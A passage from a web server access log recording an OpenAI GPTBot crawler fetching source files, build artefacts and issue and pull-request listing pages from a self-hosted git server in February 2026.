+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:19:13:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11139] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:19:13:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=rendered" [Client 74.7.227.38] [Length 11131] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:19:13:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33695] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:19:13:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33695] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:19:13:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=rendered" [Client 74.7.227.38] [Length 11129] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:19:13:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=source" [Client 74.7.227.38] [Length 33390] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:19:13:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=source" [Client 74.7.227.38] [Length 33390] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:19:13:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11144] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:19:13:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache?display=rendered" [Client 74.7.227.38] [Length 10953] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" -[17/Feb/2026:19:13:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=open&type=all" -[17/Feb/2026:19:13:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/libssl-3-x64.dll?display=rendered" [Client 74.7.227.38] [Length 11068] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libssl-3-x64.dll" -[17/Feb/2026:19:13:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 11212] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:19:14:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10246] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:14:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/controller-cpp2.md?display=source" [Client 74.7.227.38] [Length 56639] [Gzip 9.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/controller-cpp2.md" -[17/Feb/2026:19:14:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:14:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:14:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10047] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:14:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:14:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:14:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:14:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:14:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:14:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10221] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:14:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10044] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:14:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:14:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:14:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:14:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:14:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:14:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:14:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:14:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:14:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10056] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:14:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10166] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:14:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:14:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:14:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10053] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:14:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:14:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:14:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:14:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:14:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:14:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:14:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old-transport.hpp?display=rendered" [Client 74.7.227.38] [Length 11275] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:19:14:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11438] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:19:14:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11436] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:19:14:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:14:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&project=-1&state=closed&type=all" -[17/Feb/2026:19:14:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:14:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&state=open&type=all" -[17/Feb/2026:19:14:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:14:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:14:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10004] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:14:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.48] [Sent-to 